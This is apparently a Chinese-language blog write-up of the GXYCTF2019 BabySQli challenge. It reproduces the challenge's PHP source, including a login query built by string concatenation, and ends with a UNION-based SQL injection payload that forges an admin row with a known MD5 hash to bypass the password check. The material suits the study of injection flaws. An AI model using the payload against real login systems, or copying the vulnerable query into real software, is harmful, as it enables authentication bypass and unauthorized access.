php程式碼審計-使用者名稱和密碼分開檢驗
阿新 • • 發佈:2020-10-25
程式碼 [GXYCTF2019]BabySQli
- config.php
<?php
DEFINE('DB_USER','123');
DEFINE('DB_PASSWORD','123');
DEFINE('db_host','127.0.0.1');
DEFINE('DB_NAME','web_sqli');
$con=@mysqli_connect(db_host,DB_USER,DB_PASSWORD,DB_NAME) OR die ('couldnt connect'.mysqli_connect_error());
?>
- flag.php
<?php $flag = 'GXY{y0u_4re_not_aDmin!}';?>
- index.php
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Do you know who am I?</title> <center> <form action="search.php" method="post" style="margin-top: 300"> <input type="text" name="name" placeholder="UserName" required> <br> <input type="password" style="margin-top: 20" name="pw" placeholder="password" required> <br> <button style="margin-top:20;" type="submit">登入</button> </form> </center>
- search.php
<!--MMZFM422K5HDASKDN5TVU3SKOZRFGQRRMMZFM6KJJBSG6WSYJJWESSCWPJNFQSTVLFLTC3CJIQYGOSTZKJ2VSVZRNRFHOPJ5--> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Do you know who am I?</title> <?php require "config.php"; require "flag.php"; // 去除轉義 if (get_magic_quotes_gpc()) { function stripslashes_deep($value) { $value = is_array($value) ? array_map('stripslashes_deep', $value) : stripslashes($value); return $value; } $_POST = array_map('stripslashes_deep', $_POST); $_GET = array_map('stripslashes_deep', $_GET); $_COOKIE = array_map('stripslashes_deep', $_COOKIE); $_REQUEST = array_map('stripslashes_deep', $_REQUEST); } mysqli_query($con,'SET NAMES UTF8'); $name = $_POST['name']; $password = $_POST['pw']; $t_pw = md5($password); $sql = "select * from user where username = '".$name."'"; // echo $sql; $result = mysqli_query($con, $sql); if(preg_match("/\(|\)|\=|or/", $name)){ die("do not hack me!"); } else{ if (!$result) { printf("Error: %s\n", mysqli_error($con)); exit(); } else{ // echo '<pre>'; $arr = mysqli_fetch_row($result); // print_r($arr); if($arr[1] == "admin"){ if(md5($password) == $arr[2]){ echo $flag; } else{ die("wrong pass!"); } } else{ die("wrong user!"); } } } ?>
關鍵程式碼在search.php
$sql = select * from user where username = '$name';
$result = mysqli_query($con, $sql);
正常的邏輯應該為:
<?php
$servername = "localhost";
$username = "username";
$password = "password";
$dbname = "myDB";
// 建立連線
$conn = mysqli_connect($servername, $username, $password, $dbname);
// Check connection
if (!$conn) {
die("連線失敗: " . mysqli_connect_error());
}
$sql = "SELECT id, firstname, lastname FROM MyGuests";
$result = mysqli_query($conn, $sql);
if (mysqli_num_rows($result) > 0) {
// 輸出資料
while($row = mysqli_fetch_assoc($result)) {
echo "id: " . $row["id"]. " - Name: " . $row["firstname"]. " " . $row["lastname"]. "<br>";
}
} else {
echo "0 結果";
}
mysqli_close($conn);
?>
mysql Union查詢特性
在聯合查詢並不存在的資料時,聯合查詢就會構造一個虛擬的資料。
所以,如果username輸入
1' union select 1,'admin','900150983cd24fb0d6963f7d28e17f72'#
password輸入abc,就可以登入成功